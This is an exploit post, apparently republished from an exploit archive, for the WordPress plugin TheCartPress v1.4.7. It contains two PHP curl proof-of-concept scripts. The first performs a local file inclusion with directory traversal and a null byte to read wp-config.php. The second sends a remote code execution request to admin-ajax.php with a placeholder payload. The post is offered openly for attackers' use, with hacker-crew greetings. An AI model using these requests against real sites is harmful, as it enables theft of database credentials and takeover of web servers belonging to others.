WordPress TheCartPress v1.4.7 Plugin Multiple Vulnerabilities

Posted on Posted in Exploit
Full title WordPress TheCartPress v1.4.7 Plugin Multiple Vulnerabilities
Date add 03-12-2015
Category web applications
Platform php
Risk
Security Risk High
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : Multiple
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://thecartpress.com
#
###########################################
#
# [!] Description :
#
# WordPress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities
# remote attacker can disclosure some local files or do a remote code execution.
#
####
 
// page : Miranda.class.php
// lines : 111.. 115
 
/* --[1] Local File Include -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
 
/* --[2] Remote Code Execution -- */
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
 
####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####

Quelle: 0day.today

Facebooktwittergoogle_plus